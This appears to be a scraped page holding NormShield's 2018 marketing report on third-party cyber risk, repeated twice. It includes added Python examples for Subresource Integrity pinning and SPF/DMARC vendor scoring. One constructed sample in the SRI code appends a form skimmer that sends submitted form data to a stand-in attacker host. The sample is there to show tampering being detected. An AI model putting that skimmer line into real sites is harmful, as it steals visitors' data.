THE WEAKEST LINK MAY NOT BE IN YOUR SYSTEM
NormShield 3rd Party Cyber Risk Report
www.normshield.com
Phone +1 (571) 335-0222 | Email info@normshield.com | 8200 Greensboro Dr. Ste 900, McLean, VA 22102
The weakest link may not be in your system
Matt, the CISO of a large company, comes to the office on a Friday. He is a very successful Chief Information Security Officer and is confident in the capabilities of his team. They handle all vulnerabilities inside their own systems, continuously scan and monitor those systems, and use cutting-edge security tools such as firewalls, WAFs, IDS/IPS and Data Leak Protection (DLP) technologies.

The cyber security awareness of the employees is quite high and they do everything they can to avoid phishing-type attacks. The possibility that something goes wrong seems very low. However, that Friday morning, when Matt looks at the online news, he is shocked to discover that a large amount of their client information has been leaked. He starts to investigate and finds nothing in their own systems. Later, he finds out that the leak originated from a third party: a data management company that manages e-mail for large companies.
Recently we have heard similar stories about breaches caused by 3rd parties such as vendors, subsidiaries, web hosting companies, law firm partners, firms in the supply chain, etc. Large companies such as financial institutions and e-commerce companies have been improving their cyber security systems against external and even internal attacks. They can identify vulnerabilities in their own systems with monitoring and/or scanning tools and take the necessary precautions. However, all these efforts might be for nothing if 3rd party cyber risk is unknown: a vendor that holds your data or has access to your network is part of your attack surface whether or not you monitor it. 3rd party risk management and data governance are therefore growing concerns.

It is not surprising that the recently revised version of the U.S. National Institute of Standards and Technology's Cybersecurity Framework (NIST CSF version 1.1, released in April 2018) now includes supply chain cyber risk management1.
1. https://www.wsj.com/articles/amid-national-security-warnings-nist-adds-supply-chain-security-to-cyber-framework-1524175900
What is a 3rd party?
3rd parties include a broad range of companies you work with directly, such as data management companies, law firms, e-mail providers, web hosting companies, subsidiaries, vendors and sub-contractors; basically any company whose employees have some level of access to your systems or your data.

However, third party cyber risk is not limited to these companies. Any external software or hardware that you use in your systems also poses a cyber risk. Even the JavaScript that is added to your website for analytics may cause a breach by collecting information about the people who visit your website: a script loaded from a third-party server runs in your visitors' browsers with the same access to the page as your own code. Considering recent attacks that placed backdoors in well-known software, such as CCleaner in 2017, the definition of a 3rd party should not be limited to the companies you work with. Even IoT devices can be considered a third party and can be the source of a breach. Very recently a casino was hacked through an Internet-connected thermometer in an aquarium in its lobby.
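One concrete control for the third-party JavaScript risk mentioned above is Subresource Integrity (SRI): the site owner reviews the script once, pins its hash in the script tag, and the browser refuses to run the file if the vendor (or whoever compromises the vendor's CDN) later serves different bytes. The following Python is an added example written for this page, not code from the report or from NormShield; the script contents, the CDN URL and the tampered variant are constructed for the illustration.

```python
"""Added example: pin a third-party script with Subresource Integrity (SRI)."""
import base64
import hashlib
import hmac
import html

# Constructed sample: the analytics snippet exactly as the site owner reviewed it.
REVIEWED_SCRIPT = b"window.track=function(e){navigator.sendBeacon('/collect',JSON.stringify(e))};\n"
# Constructed sample: the same file after the vendor's CDN is compromised and a form
# skimmer is appended; the hash pinned in the page no longer matches these bytes.
TAMPERED_SCRIPT = REVIEWED_SCRIPT + (
    b"document.addEventListener('submit',e=>fetch('https://evil.example/x',"
    b"{method:'POST',body:new FormData(e.target)}));\n")

SRI_STRENGTH = {"sha256": 1, "sha384": 2, "sha512": 3}   # the only algorithms SRI allows


def sri_hash(content: bytes, algo: str = "sha384") -> str:
    """Integrity value for the exact bytes reviewed, e.g. 'sha384-<base64 digest>'."""
    if algo not in SRI_STRENGTH:
        raise ValueError("SRI allows only sha256, sha384 or sha512")
    digest = hashlib.new(algo, content).digest()
    return f"{algo}-{base64.b64encode(digest).decode('ascii')}"


def sri_matches(content: bytes, integrity: str) -> bool:
    """Emulate the browser: consider only tokens of the strongest listed algorithm and
    accept the resource if any of them matches the bytes actually fetched."""
    tokens = [t for t in integrity.split() if t.partition("-")[0] in SRI_STRENGTH]
    if not tokens:
        return False   # no usable token: browsers skip the check entirely, this helper fails closed
    strongest = max(SRI_STRENGTH[t.partition("-")[0]] for t in tokens)
    for token in tokens:
        algo, _, digest = token.partition("-")
        if SRI_STRENGTH[algo] != strongest:
            continue
        expected = f"{algo}-{digest.split('?')[0]}"   # strip any ?option suffix
        if hmac.compare_digest(sri_hash(content, algo), expected):
            return True
    return False


def script_tag(src: str, content: bytes) -> str:
    """The <script> tag that pins src to the reviewed bytes. crossorigin="anonymous" is
    required for SRI on a cross-origin script so the browser may read the response to hash it."""
    return (f'<script src="{html.escape(src, quote=True)}" '
            f'integrity="{sri_hash(content)}" crossorigin="anonymous"></script>')
```

The caveat a practitioner hits immediately: SRI only works for a fixed file. Analytics and tag-manager loaders that the vendor updates on its own side will simply stop loading once pinned, so for those the realistic options are self-hosting a reviewed copy (and pinning that) or at least limiting where the page may load scripts from and send data to with a Content-Security-Policy header.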
GDPR perspective on third parties
The upcoming European Union General Data Protection Regulation (GDPR) uses the terms data processor and data controller. As the name suggests, a third-party data processor is an entity that processes personal data (personally identifiable information, PII) on behalf of a controller; e-mail service providers, customer relationship management services, etc. are typical examples.

A controller is defined by the GDPR as the entity that determines how and for what purpose that data will be processed. Every company that works with third-party data processors has to ensure that these third parties comply, or intend to comply, with the upcoming GDPR rules. The controller remains responsible for choosing processors that provide sufficient guarantees, so a breach at the processor is the controller's problem too.
Recent breaches caused by 3rd parties
The figure below shows recent breaches/incidents caused by third parties. As seen from these breaches/incidents, the third party that caused a breach might be a law firm (usually the weakest link), an accounting firm, or even a firm that handles HVAC jobs; or it might be a company that provides web hosting, data management, e-mail services, etc.
How much do you trust the cyber security measures of 3rd-party companies?
A recent survey conducted by the Ponemon Institute reveals that 56% of respondents experienced a 3rd-party breach in 2017, a 7-point increase over the previous year2. Another survey, conducted by Deloitte in 2016, gives more depressing numbers, reporting that 87% of organizations had experienced a disruptive incident with third parties in the last 2-3 years. Another piece of research from 2016, sponsored by Soha Systems, reports that 63% of all breaches were related to third parties.

The fines and settlements paid because of such breaches are large, exceeding US$7 million per breach in some cases. For instance, Target paid more than $116 million in civil settlements related to its 2013 breach, which began with credentials stolen from an HVAC company. The total cost to the company because of this breach exceeded $290 million. With the upcoming GDPR, we shall see higher fines for each breach involving the personal data of people in the EU. GDPR fines can go up to 20 million euros or 4% of annual global turnover, whichever is higher.
2. https://www.opus.com/ponemon/
How much do you know about third parties?
The Ponemon Institute report shows that 57% of companies do not know whether they share sensitive information with third parties, and they do not know whether the third parties' security measures would prevent a breach. As a result, only 17% feel that they are highly capable of mitigating third party risk and 60% feel unprepared to check or verify their third parties.
How to assess 3rd party risk?
Many companies either do not assess the cyber risk of their third parties at all or use the old-school questionnaire methodology (sending a list of questions for the third party to answer and assessing the risk based on the answers). First of all, questionnaire-based assessment is very time consuming (even though there are some online tools for it), and because the answers are self-reported they are not reliable. Even if we assume that the answers are correct and we collect the results quickly, there might be cyber risks that are invisible to the third party itself: forgotten subdomains, exposed services, expired certificates or misconfigured e-mail authentication that nobody inside that company is looking at. This type of "hidden" risk can only be detected by gathering cyber threat intelligence from the outside and evaluating the risk from what is actually observable.

Fortunately, there are several platforms that gather third party data and provide a risk score or security rating for the companies related to a given company. NormShield, BitSight, SecurityScorecard, UpGuard and RiskRecon are top players in the third-party risk scoring business. They all provide a risk score or security rating for any company added as a third party, assess its cyber risk and show how it affects the main company. This type of information can also be used for mergers and acquisitions.
Using NormShield Cyber Risk Scorecard to assess third parties
As an example, we explain how to use NormShield Cyber Risk Scorecard to assess the third parties of a company. In NormShield Cyber Risk Scorecard, you can create an ecosystem that includes the main company and all the third parties to be added. More than one ecosystem can be created, for example an ecosystem including the companies/branches owned by the main company, an ecosystem for third parties, or even an ecosystem that includes only the law firms you work with. A third party can then be added simply by typing its website. NormShield first discovers the digital footprint of the third party (domains, subdomains, IP addresses, DNS records, services, social media accounts, ASN, e-mail addresses, company info, etc.) to see what hackers see about this third party. Then NormShield evaluates the cyber risk with its proprietary algorithm across 20 different categories, and how the cyber risk of this third party affects the overall ecosystem. Below is a list of some of the categories taken into consideration.

The main company can then contact the third party, discuss the issues found by NormShield Cyber Risk Scorecard, and remediate and mitigate the risk.
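To make the "hidden risk" idea of the previous section and the footprint-and-score step of this one concrete, here is an added example written for this page; it is not NormShield's proprietary algorithm (whose categories and weights are not public). It scores one category that every external rating covers, e-mail security, purely from the SPF and DMARC records in a vendor domain's DNS, which is evidence the vendor cannot misreport on a questionnaire. The domain names, the DNS answers, the penalties and the grade cut-offs are all constructed assumptions; in practice the TXT answers would come from live or passive DNS lookups rather than from the embedded dictionary.

```python
"""Added example: outside-in e-mail security scoring for a vendor domain (SPF + DMARC)."""

# Constructed DNS answers for a hypothetical vendor. In practice these come from live
# or passive DNS lookups (e.g. dnspython); none of these names is a real domain.
SAMPLE_DNS = {
    "vendor-example.test": {"TXT": ["v=spf1 include:_spf.mailhost.test include:_spf.crm.test ~all"]},
    "_dmarc.vendor-example.test": {"TXT": ["v=DMARC1; p=none; rua=mailto:dmarc@vendor-example.test"]},
    "_spf.mailhost.test": {"TXT": ["v=spf1 ip4:203.0.113.0/24 -all"]},
    "_spf.crm.test": {"TXT": ["v=spf1 include:_spf.crm-a.test include:_spf.crm-b.test -all"]},
    "_spf.crm-a.test": {"TXT": ["v=spf1 a mx -all"]},
    "_spf.crm-b.test": {"TXT": ["v=spf1 ip6:2001:db8::/32 -all"]},
}
# SPF terms that cost a DNS query; RFC 7208 section 4.6.4 allows at most 10 per evaluation.
SPF_LOOKUP_TERMS = ("include", "a", "mx", "ptr", "exists")
# Assumed grade cut-offs for the illustration (the penalties below are assumptions too).
GRADES = (("A", 90), ("B", 80), ("C", 70), ("D", 60), ("F", 0))


def get_spf(domain, dns):
    """Return the domain's SPF record (the TXT answer starting with v=spf1), or None."""
    for txt in dns.get(domain, {}).get("TXT", []):
        if txt.lower().startswith("v=spf1"):
            return txt
    return None


def spf_all_qualifier(record):
    """Qualifier of the record's 'all' term: '-', '~', '?' or '+'; None if there is no 'all'."""
    for term in record.split()[1:]:
        if term.lstrip("+-~?").lower() == "all":
            return term[0] if term[0] in "+-~?" else "+"
    return None


def spf_lookup_count(domain, dns, _depth=0):
    """Count DNS-querying terms reachable from the domain's SPF record, following include/redirect."""
    record = get_spf(domain, dns)
    if record is None or _depth > 10:   # missing record, or a runaway include chain
        return 0
    count = 0
    for term in record.split()[1:]:
        term = term.lstrip("+-~?")
        if term.lower().startswith("redirect="):
            count += 1 + spf_lookup_count(term.split("=", 1)[1], dns, _depth + 1)
            continue
        name, _, arg = term.partition(":")
        name = name.split("/")[0].lower()   # 'a/24' or 'mx/24' still cost one lookup
        if name in SPF_LOOKUP_TERMS:
            count += 1
            if name == "include" and arg:
                count += spf_lookup_count(arg, dns, _depth + 1)
    return count


def get_dmarc(domain, dns):
    """Parse _dmarc.<domain> TXT into a tag dict ({'v': 'DMARC1', 'p': 'none', ...}), or None."""
    for txt in dns.get(f"_dmarc.{domain}", {}).get("TXT", []):
        if txt.upper().startswith("V=DMARC1"):
            tags = {}
            for part in txt.split(";"):
                key, _, value = part.strip().partition("=")
                if key:
                    tags[key.strip().lower()] = value.strip()
            return tags
    return None


def score_email_security(domain, dns=SAMPLE_DNS):
    """Score one category from externally observable facts only: no questionnaire needed."""
    score, findings = 100, []
    spf = get_spf(domain, dns)
    if spf is None:
        score -= 30
        findings.append("no SPF record: any host may send mail as this domain")
    else:
        qualifier = spf_all_qualifier(spf)
        if qualifier in ("+", "?", None):
            score -= 25
            findings.append("SPF does not restrict senders: %s" % (qualifier + "all" if qualifier else "no 'all' term"))
        elif qualifier == "~":
            score -= 10
            findings.append("SPF soft fail (~all): spoofed mail is only marked, not rejected")
        lookups = spf_lookup_count(domain, dns)
        if lookups > 10:
            score -= 15
            findings.append(f"SPF needs {lookups} DNS lookups (limit 10): receivers return permerror")
    dmarc = get_dmarc(domain, dns)
    if dmarc is None:
        score -= 30
        findings.append("no DMARC record: spoofing is neither blocked nor reported")
    else:
        if dmarc.get("p", "none").lower() == "none":
            score -= 15
            findings.append("DMARC p=none: monitoring only, spoofed mail is still delivered")
        if "rua" not in dmarc:
            score -= 5
            findings.append("DMARC has no rua= address: nobody receives aggregate reports")
    score = max(score, 0)
    grade = next(letter for letter, cutoff in GRADES if score >= cutoff)
    return {"domain": domain, "score": score, "grade": grade, "findings": findings}


if __name__ == "__main__":
    for domain in ("vendor-example.test", "unknown-vendor.test"):
        print(score_email_security(domain))
```

On the constructed vendor this yields a C (75/100) with two findings, a soft-fail SPF and a monitoring-only DMARC policy, which is exactly what the vendor's questionnaire answer ("we have SPF and DMARC") would hide; a domain with no records at all scores an F. The same pattern, a rule set over externally observable facts, extends to the other footprint items the report lists: certificate expiry on discovered subdomains, open services on discovered IP ranges, and so on.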
About NormShield
We provide a Cyber Risk Scorecard for companies, just like a FICO score. Cyber security is on every Board's agenda, and the average total cost of a data breach has risen to $4 million (Ponemon/IBM). NormShield Cyber Risk Scorecards provide the information necessary to protect a business from cyber-attacks. The scorecards provide a letter grade and a drill-down into the data for each risk category so that remediation of vulnerabilities can be prioritized. NormShield's products are the Unified Threat & Vulnerability Orchestration Platform and the Cyber Risk Scorecard.
To learn your company's risk score, please visit https://www.normshield.com/ and click on Learn Now.
RTTS
 
Designing Great Products: The Power of Design and Leadership by Chief Designe...
Designing Great Products: The Power of Design and Leadership by Chief Designe...Designing Great Products: The Power of Design and Leadership by Chief Designe...
Designing Great Products: The Power of Design and Leadership by Chief Designe...
Product School
 
GDG Cloud Southlake #33: Boule & Rebala: Effective AppSec in SDLC using Deplo...
GDG Cloud Southlake #33: Boule & Rebala: Effective AppSec in SDLC using Deplo...GDG Cloud Southlake #33: Boule & Rebala: Effective AppSec in SDLC using Deplo...
GDG Cloud Southlake #33: Boule & Rebala: Effective AppSec in SDLC using Deplo...
James Anderson
 
Unsubscribed: Combat Subscription Fatigue With a Membership Mentality by Head...
Unsubscribed: Combat Subscription Fatigue With a Membership Mentality by Head...Unsubscribed: Combat Subscription Fatigue With a Membership Mentality by Head...
Unsubscribed: Combat Subscription Fatigue With a Membership Mentality by Head...
Product School
 

Recently uploaded (20)

Search and Society: Reimagining Information Access for Radical Futures
Search and Society: Reimagining Information Access for Radical FuturesSearch and Society: Reimagining Information Access for Radical Futures
Search and Society: Reimagining Information Access for Radical Futures
 
"Impact of front-end architecture on development cost", Viktor Turskyi
"Impact of front-end architecture on development cost", Viktor Turskyi"Impact of front-end architecture on development cost", Viktor Turskyi
"Impact of front-end architecture on development cost", Viktor Turskyi
 
Empowering NextGen Mobility via Large Action Model Infrastructure (LAMI): pav...
Empowering NextGen Mobility via Large Action Model Infrastructure (LAMI): pav...Empowering NextGen Mobility via Large Action Model Infrastructure (LAMI): pav...
Empowering NextGen Mobility via Large Action Model Infrastructure (LAMI): pav...
 
Knowledge engineering: from people to machines and back
Knowledge engineering: from people to machines and backKnowledge engineering: from people to machines and back
Knowledge engineering: from people to machines and back
 
AI for Every Business: Unlocking Your Product's Universal Potential by VP of ...
AI for Every Business: Unlocking Your Product's Universal Potential by VP of ...AI for Every Business: Unlocking Your Product's Universal Potential by VP of ...
AI for Every Business: Unlocking Your Product's Universal Potential by VP of ...
 
ODC, Data Fabric and Architecture User Group
ODC, Data Fabric and Architecture User GroupODC, Data Fabric and Architecture User Group
ODC, Data Fabric and Architecture User Group
 
Key Trends Shaping the Future of Infrastructure.pdf
Key Trends Shaping the Future of Infrastructure.pdfKey Trends Shaping the Future of Infrastructure.pdf
Key Trends Shaping the Future of Infrastructure.pdf
 
Epistemic Interaction - tuning interfaces to provide information for AI support
Epistemic Interaction - tuning interfaces to provide information for AI supportEpistemic Interaction - tuning interfaces to provide information for AI support
Epistemic Interaction - tuning interfaces to provide information for AI support
 
GenAISummit 2024 May 28 Sri Ambati Keynote: AGI Belongs to The Community in O...
GenAISummit 2024 May 28 Sri Ambati Keynote: AGI Belongs to The Community in O...GenAISummit 2024 May 28 Sri Ambati Keynote: AGI Belongs to The Community in O...
GenAISummit 2024 May 28 Sri Ambati Keynote: AGI Belongs to The Community in O...
 
Leading Change strategies and insights for effective change management pdf 1.pdf
Leading Change strategies and insights for effective change management pdf 1.pdfLeading Change strategies and insights for effective change management pdf 1.pdf
Leading Change strategies and insights for effective change management pdf 1.pdf
 
LF Energy Webinar: Electrical Grid Modelling and Simulation Through PowSyBl -...
LF Energy Webinar: Electrical Grid Modelling and Simulation Through PowSyBl -...LF Energy Webinar: Electrical Grid Modelling and Simulation Through PowSyBl -...
LF Energy Webinar: Electrical Grid Modelling and Simulation Through PowSyBl -...
 
Slack (or Teams) Automation for Bonterra Impact Management (fka Social Soluti...
Slack (or Teams) Automation for Bonterra Impact Management (fka Social Soluti...Slack (or Teams) Automation for Bonterra Impact Management (fka Social Soluti...
Slack (or Teams) Automation for Bonterra Impact Management (fka Social Soluti...
 
FIDO Alliance Osaka Seminar: Overview.pdf
FIDO Alliance Osaka Seminar: Overview.pdfFIDO Alliance Osaka Seminar: Overview.pdf
FIDO Alliance Osaka Seminar: Overview.pdf
 
Mission to Decommission: Importance of Decommissioning Products to Increase E...
Mission to Decommission: Importance of Decommissioning Products to Increase E...Mission to Decommission: Importance of Decommissioning Products to Increase E...
Mission to Decommission: Importance of Decommissioning Products to Increase E...
 
FIDO Alliance Osaka Seminar: FIDO Security Aspects.pdf
FIDO Alliance Osaka Seminar: FIDO Security Aspects.pdfFIDO Alliance Osaka Seminar: FIDO Security Aspects.pdf
FIDO Alliance Osaka Seminar: FIDO Security Aspects.pdf
 
To Graph or Not to Graph Knowledge Graph Architectures and LLMs
To Graph or Not to Graph Knowledge Graph Architectures and LLMsTo Graph or Not to Graph Knowledge Graph Architectures and LLMs
To Graph or Not to Graph Knowledge Graph Architectures and LLMs
 
JMeter webinar - integration with InfluxDB and Grafana
JMeter webinar - integration with InfluxDB and GrafanaJMeter webinar - integration with InfluxDB and Grafana
JMeter webinar - integration with InfluxDB and Grafana
 
Designing Great Products: The Power of Design and Leadership by Chief Designe...
Designing Great Products: The Power of Design and Leadership by Chief Designe...Designing Great Products: The Power of Design and Leadership by Chief Designe...
Designing Great Products: The Power of Design and Leadership by Chief Designe...
 
GDG Cloud Southlake #33: Boule & Rebala: Effective AppSec in SDLC using Deplo...
GDG Cloud Southlake #33: Boule & Rebala: Effective AppSec in SDLC using Deplo...GDG Cloud Southlake #33: Boule & Rebala: Effective AppSec in SDLC using Deplo...
GDG Cloud Southlake #33: Boule & Rebala: Effective AppSec in SDLC using Deplo...
 
Unsubscribed: Combat Subscription Fatigue With a Membership Mentality by Head...
Unsubscribed: Combat Subscription Fatigue With a Membership Mentality by Head...Unsubscribed: Combat Subscription Fatigue With a Membership Mentality by Head...
Unsubscribed: Combat Subscription Fatigue With a Membership Mentality by Head...
 

3rd Party Cyber Risk Report - 2018

Recently, we have heard similar stories about breaches caused by 3rd parties such as vendors, subsidiaries, web hosting companies, law firm partners, firms in the supply chain, etc. Large companies such as financial institutions and e-commerce companies have been improving their cyber security systems against external and even internal attacks. They can identify vulnerabilities in their own systems with monitoring and/or scanning tools and take the necessary precautions. However, all these efforts might be for nothing if 3rd party cyber risk is unknown. 3rd party risk management and data governance are growing concerns.

It is not surprising that, very recently, the revised version of the U.S. National Institute of Standards and Technology's Cybersecurity Framework (NIST) now includes supply chain cyber risk management [1].

[1] https://www.wsj.com/articles/amid-national-security-warnings-nist-adds-supply-chain-security-to-cyber-framework-1524175900
What is a 3rd Party?

3rd parties include a broad range of companies you work with directly, such as data management companies, law firms, e-mail providers, web hosting companies, subsidiaries, vendors and sub-contractors: basically any company some of whose employees have some level of access to your system or your data. However, third party cyber risk is not limited to these companies. Any external software or hardware that you use in your system also poses a cyber risk. Even the JavaScript added to your website for analytics may cause a breach by collecting information about the people who visit your website. Considering recent attacks that planted backdoors in well-known software, such as CCleaner in 2017, the definition of 3rd party should not be limited to the companies you work with. Even IoT devices can be considered a third party and can be the source of a breach. Very recently a casino was hacked through an Internet-connected thermometer in an aquarium in its lobby.
GDPR perspective on third parties

The upcoming European Union General Data Protection Regulation (GDPR) uses the terms third-party data processor and controller. As the name suggests, a third-party data processor is an entity that processes personally identifiable information (PII) on behalf of a controller; typically this means e-mail service providers, customer relationship management services, etc. A controller is defined by the GDPR as the entity that determines how that data will be processed and for what purpose. All companies that work with third-party data processors have to ensure that these third parties comply, or intend to comply, with the upcoming GDPR rules.
Recent breaches caused by 3rd parties

The figure below shows recent breaches/incidents caused by third parties. As these breaches/incidents show, the third party that caused a breach might be a law firm (usually the weakest link), an accounting firm, or even a firm that handles HVAC jobs; or it might be a company that provides web hosting, data management, e-mail services, etc.
How much do you trust the cyber security measures of 3rd-party companies?

A recent survey conducted by the Ponemon Institute reveals that 56% of organizations experienced a 3rd-party breach in 2017, a 7% increase over the previous year [2]. Another survey conducted by Deloitte in 2016 gives more depressing numbers, reporting that 87% of organizations have experienced a disruptive incident with third parties in the last 2-3 years. Another study in 2016, sourced by Soha Systems, reports that 63% of all breaches were related to third parties.

The fines paid because of such breaches are quite large, at more than US$7 million per breach. For instance, Target paid more than $116 million in civil settlements related to its 2013 breach, which was caused by an HVAC company. The total cost to the company of this breach exceeded $290 million. With the upcoming GDPR, we shall see higher fines for each breach affecting EU citizens: GDPR fines can go up to 20 million Euros or 4% of annual global turnover (whichever is higher).

[2] https://www.opus.com/ponemon/
How much do you know about your third parties?

The Ponemon Institute report shows that 57% of companies do not know whether they share sensitive information with third parties, nor whether those third parties' security measures would prevent a breach. As a result, only 17% feel that they are highly capable of mitigating third party risk, and 60% feel unprepared to check or verify their third parties.
How to assess 3rd party risk?

Many companies either do not assess the cyber risk of their third parties at all or use the old-school questionnaire methodology (sending a set of questions for the third party to answer and assessing the risk based on the answers). First of all, questionnaire-based assessment is very time consuming (even though there are online tools for it) and the answers are not reliable. Even if we assume that the answers are correct and the results are collected quickly, there might be cyber risks that are invisible to the third party itself. This type of "hidden" risk can only be detected by gathering cyber threat intelligence and evaluating the risk.

Fortunately, there are several platforms that gather third party data and provide a risk score or security rating for the companies related to a given company. NormShield, BitSight, SecurityScorecard, UpGuard, and RiskRecon are top players in the third-party risk scoring business. They all provide a risk score or security rating for any company added as a third party, assess its cyber risk, and show how it affects the main company. This type of information can also be used for mergers and acquisitions.
Using NormShield Cyber Risk Scorecard to assess third parties

As an example, we explain how to use NormShield Cyber Risk Scorecard to assess the third parties of a company. In NormShield Cyber Risk Scorecard, you create an ecosystem that includes the main company and all the third parties to be added. More than one ecosystem can be created, such as an ecosystem of the companies/branches owned by the main company, an ecosystem of third parties, or even an ecosystem that includes only the law firms you work with. A third party can then be added simply by typing its website. NormShield first discovers the digital footprint of the third party (domains, subdomains, IP addresses, DNS records, services, social media accounts, ASN, e-mails, company info, etc.) to see what hackers see on this third party. NormShield then evaluates the cyber risk with its proprietary algorithm across 20 different categories, and determines how the cyber risk of this third party affects the overall ecosystem. Below is a list of some of the categories taken into consideration.

The main company can then contact the third party, discuss the issues found by NormShield Cyber Risk Scorecard, and remediate and mitigate the risk.
About NormShield

We provide a Cyber Risk Scorecard for companies, just like a FICO score. Cyber security is on every Board's agenda, and the average total cost of a data breach has risen to $4 million (Ponemon/IBM). NormShield Cyber Risk Scorecards provide the information necessary to protect a business from cyber-attacks. The scorecards provide a letter grade and a drill-down into the data for each risk category so that remediation of vulnerabilities can be prioritized. Unified Threat & Vulnerability Orchestration Platform and Cyber Risk Scorecard. To learn your company's risk score, please visit https://www.normshield.com/ and click on Learn Now.

www.normshield.com
1 (571) 335 02 22
info@normshield.com
NormShield HQ
8200 Greensboro Drive, Suite 900
McLean, VA 22102